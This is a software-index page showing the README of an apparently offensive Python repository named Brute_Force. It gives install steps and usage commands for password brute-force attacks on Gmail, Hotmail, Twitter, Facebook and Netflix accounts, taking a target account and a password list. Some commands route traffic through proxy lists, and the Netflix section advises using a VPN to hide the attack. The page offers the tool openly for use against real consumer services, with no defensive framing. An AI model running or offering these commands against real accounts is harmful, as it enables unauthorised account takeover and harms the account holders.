An open API service indexing awesome lists of open source software.

https://github.com/matrix07ksa/brute_force

Brute_Force_Attack Gmail Hotmail Twitter Facebook Netflix
https://github.com/matrix07ksa/brute_force

Last synced: about 1 year ago
JSON representation

Brute_Force_Attack Gmail Hotmail Twitter Facebook Netflix

Awesome Lists containing this project

README

          

# Brute_Force
[![Python 3.7](https://img.shields.io/badge/Python-3.7-blue.svg)](http://www.python.org/download/)
[![GPL](https://img.shields.io/badge/GPL-V3.0-red.svg)](https://www.gnu.org/licenses/gpl-3.0.html)
[![Termux](https://img.shields.io/badge/Termux-Android-brightgreen.svg)](https://termux.com/)
![platform](https://img.shields.io/badge/Platform-Linux%7CMacOS%7CWindows-brightgreen.svg)
![Twitter](https://img.shields.io/twitter/follow/Matrix0700.svg?style=social&label=Follow)
![alt text](https://1.bp.blogspot.com/-oPEVZN0ymsc/XS59nlfrrgI/AAAAAAAAPmI/5TsU1GjCzsE32ognWuV1xI-5jUvLjCkdgCLcBGAs/s1600/Brute_Force_1.png)
![alt text](https://1.bp.blogspot.com/-SIeGPGxLUWQ/XS59nkXfYEI/AAAAAAAAPmM/P0-rKgkEjm0iFTrhpwhxBAV7vAKAo0KPQCLcBGAs/s1600/Brute_Force_2.png)
## install :
```bash
sudo apt install python3 python3-pip

pip3 install proxylist

pip3 install mechanize
```

# Usage:

## BruteForce Gmail Attack
```bash
python3 Brute_Force.py -g Account@gmail.com -l File_list

python3 Brute_Force.py -g Account@gmail.com -p Password_Single
```

## BruteForce Hotmail Attack
```bash
python3 Brute_Force.py -t Account@hotmail.com -l File_list

python3 Brute_Force.py -t Account@hotmail.com -p Password_Single
```

## BruteForce Twitter Attack

```bash
python3 Brute_Force.py -T Account_Twitter -l File_list
python3 Brute_Force.py -T Account_Twitter -l File_list -X proxy-list.txt

```
## BruteForce Facebook Attack

```bash
python3 Brute_Force.py -f Account_facebook -l File_list
python3 Brute_Force.py -f Account_facebook -l File_list -X proxy-list.txt
```
## BruteForce Netflix Attack

```bash
يفضل تشغيل VPN
Start On Vpn
python3 Brute_Force.py -n Account_Netflix -l File_list
python3 Brute_Force.py -n Account_Netflix -l File_list -X proxy-list.txt

وترقبووو المزيد
```